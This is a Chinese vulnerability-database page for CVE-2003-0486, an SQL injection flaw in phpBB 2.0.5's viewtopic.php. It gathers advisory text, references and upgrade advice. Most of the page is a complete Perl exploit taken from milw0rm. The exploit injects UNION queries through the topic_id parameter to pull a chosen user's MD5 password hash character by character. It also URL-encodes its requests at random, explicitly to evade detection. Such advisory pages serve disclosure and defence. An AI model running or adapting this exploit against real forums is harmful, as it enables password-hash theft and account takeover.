CVE-2003-0486
CVSS5.0
发布时间 :2003-08-07 00:00:00
修订时间 :2016-10-17 22:34:29
NMCOES    

[原文]SQL injection vulnerability in viewtopic.php for phpBB 2.0.5 and earlier allows remote attackers to steal password hashes via the topic_id parameter.


[CNNVD]phpBB viewtopic.php topic_id远程SQL注入漏洞(CNNVD-200308-018)

        
        phpBB是一款基于WEB的流行的论坛程序。
        phpBB包含的viewtopic.php脚本不正确处理用户提交的请求,远程攻击者可以利用这个漏洞通过SQL注入攻击窃取用户敏感数据,或破坏数据库。
        phpBB在调用viewtopic.php时,直接从GET请求中获得"topic_id"并传递给SQL查询命令中,因此,攻击者可以提交特殊的SQL字符串用于获得MD5密码,获得此密码信息可以用于自动登录或者进行暴力破解。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0486
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0486
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-018
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=105607263130644&w=2
(UNKNOWN)  BUGTRAQ  20030619 phpBB password disclosure by sql injection
http://www.phpbb.com/phpBB/viewtopic.php?t=112052
(VENDOR_ADVISORY)  CONFIRM  http://www.phpbb.com/phpBB/viewtopic.php?t=112052
http://www.securityfocus.com/bid/7979
(VENDOR_ADVISORY)  BID  7979
http://xforce.iss.net/xforce/xfdb/12366
(VENDOR_ADVISORY)  XF  phpbb-viewtopic-sql-injection(12366)

- 漏洞信息

phpBB viewtopic.php topic_id远程SQL注入漏洞
中危 输入验证
2003-08-07 00:00:00 2005-10-20 00:00:00
远程  
        
        phpBB是一款基于WEB的流行的论坛程序。
        phpBB包含的viewtopic.php脚本不正确处理用户提交的请求,远程攻击者可以利用这个漏洞通过SQL注入攻击窃取用户敏感数据,或破坏数据库。
        phpBB在调用viewtopic.php时,直接从GET请求中获得"topic_id"并传递给SQL查询命令中,因此,攻击者可以提交特殊的SQL字符串用于获得MD5密码,获得此密码信息可以用于自动登录或者进行暴力破解。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * lead developer of phpBB提供了暂时的解决方案,地址如下:
        
        http://www.phpbb.com/phpBB/viewtopic.php?t=112052

        厂商补丁:
        phpBB Group
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.phpbb.com/

- 漏洞信息 (44)

phpBB 2.0.5 SQL Injection password disclosure Exploit (EDBID:44)
php webapps
2003-06-20 Verified
0 Rick Patel
N/A [点击下载]
#!/usr/bin/perl -w
#
#
# phpBB password disclosure vuln.
# - rick patel
# 
# There is a sql injection vuln which exists in /viewtopic.php file. The variable is $topic_id
# which gets passed directly to sql server in query. Attacker could pass a special sql string which
# can used to see md5 password hash for any user (!) for phpBB. This pass can be later used with
# autologin or cracked using john. 
#
# Details: 
#
# this is checking done for $topic_id in viewtopic.php:
#
# if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
# {
# $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
# }
# else if ( isset($HTTP_GET_VARS['topic']) )
# {
# $topic_id = intval($HTTP_GET_VARS['topic']);
# }
#
# ok... no else statement at end :)
# now if GET[view]=newest and GET[sid] is set, this query gets executed:
#
# $sql = "SELECT p.post_id
# FROM " . POSTS_TABLE . " p, " . SESSIONS_TABLE . " s, " . USERS_TABLE . " u
# WHERE s.session_id = '$session_id'
# AND u.user_id = s.session_user_id
# AND p.topic_id = $topic_id
# AND p.post_time >= u.user_lastvisit
# ORDER BY p.post_time ASC
# LIMIT 1";
#
# $topic_id gets passed directy to query. So how can we use this to do something important? Well
# I decided to use union and create a second query will get us something useful. There were couple of 
# problems i ran into. first, phpBB only cares about the first row returned. second, the select for first
# query is p.post_id which is int, so int becomes the type returned for any other query in union. third,
# there is rest of junk at end " AND p.post_time >= ..." We tell mysql to ignore that by placing /* at end
# of our injected query. So what query can we make that returns only int? 
# this one => select ord(substring(user_password,$index,1)) from phpbb_users where user_id = $uid
# Then all we have to do is query 32 times which $index from 1-32 and we get ord value of all chars of
# md5 hash password. 
#
# I have only tested this with mysql 4 and pgsql . Mysql 3.x does not support unions so you would have to tweak
# the query to do anything useful. 
# 
# This script is for educational purpose only. Please dont use it to do anything else. 
#
# To Fix this bug : http://www.phpbb.com/phpBB/viewtopic.php?t=112052

use IO::Socket;

$remote = shift || 'localhost';
$view_topic = shift || '/phpBB2/viewtopic.php';
$uid = shift || 2;
$port = 80;

$dbtype = 'mysql4'; # mysql4 or pgsql 


print "Trying to get password hash for uid $uid server $remote dbtype: $dbtype\n";

$p = "";

for($index=1; $index<=32; $index++)
{
$socket = IO::Socket::INET->new(PeerAddr => $remote,
PeerPort => $port,
Proto => "tcp",
Type => SOCK_STREAM)
or die "Couldnt connect to $remote:$port : $@\n";
$str = "GET $view_topic" . "?sid=1&topic_id=-1" . random_encode(make_dbsql()) .
 "&view=newest" . " HTTP/1.0\n\n";

print $socket $str;
print $socket "Cookie: phpBB2mysql_sid=1\n"; # replace this for pgsql or remove it
print $socket "Host: $remote\n\n";

while ($answer = <$socket>)
{
if ($answer =~ /Location:.*\x23(\d+)/) # Matches the Location: viewtopic.php?p=<num>#<num>
{
$p .= chr ($1);
}
}

close($socket);
}

print "\nMD5 Hash for uid $uid is $p\n";

# random encode str. helps avoid detection
sub random_encode
{
$str = shift;
$ret = "";
for($i=0; $i<length($str); $i++)
{
$c = substr($str,$i,1);
$j = rand length($str) * 1000;

if (int($j) % 2 || $c eq ' ')
{
$ret .= "%" . sprintf("%x",ord($c));
}
else
{
$ret .= $c;
}
}
return $ret;
}

sub make_dbsql
{
if ($dbtype eq 'mysql4')
{
return " union select ord(substring(user_password," . $index . ",1)) from phpbb_users where user_id=$uid/*" ;
} elsif ($dbtype eq 'pgsql')
{
return "; 
select ascii(substring(user_password from $index for 1)) as 
post_id from phpbb_posts p, phpbb_users u where u.user_id=$uid or false";
}
else 
{
return "";
}
}



# milw0rm.com [2003-06-20]
		

- 漏洞信息

2186
phpBB viewtopic.php topic_id Parameter SQL Injection
Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

phpBB contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is that the "topic_id" variable in the "viewtopic.php" module is not verified properly and will allow an attacker to inject or manipulate SQL queries.

- 时间线

2003-06-19 2003-06-19
2003-06-19 Unknow

- 解决方案

Upgrade to version phpBB is 2.0.6. as it has been reported to have fixed the issue. If unable to upgrade then it is advised to enable magic_quotes_gpc in PHP or visit the vendor website for the necessary code changes required to fix this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

phpBB Viewtopic.PHP SQL Injection Vulnerability
Input Validation Error 7979
Yes No
2003-06-19 12:00:00 2009-07-11 10:06:00
Discovery of this vulnerability has been credited to Rick <rikul@bellsouth.net>.

- 受影响的程序版本

phpBB Group phpBB 2.0.5
phpBB Group phpBB 2.0.4

- 漏洞讨论

An SQL injection vulnerability has been reported for phpBB systems that may result in the disclosure of user password hashes; other attacks may also be possible.

phpBB, in some cases, does not sufficiently sanitize user-supplied input which is used when constructing SQL queries to execute on the underlying database. As a result, it is possible to manipulate SQL queries. This may allow a remote attacker to modify query logic or potentially corrupt the database.

- 漏洞利用

The following proof of concept has been provided:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

Gentoo Linux has released an advisory. Users who have installed net-www/phpbb are advised to upgrade to phpbb-2.0.5 by issuing the following commands:

emerge sync
emerge phpbb
emerge clean

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站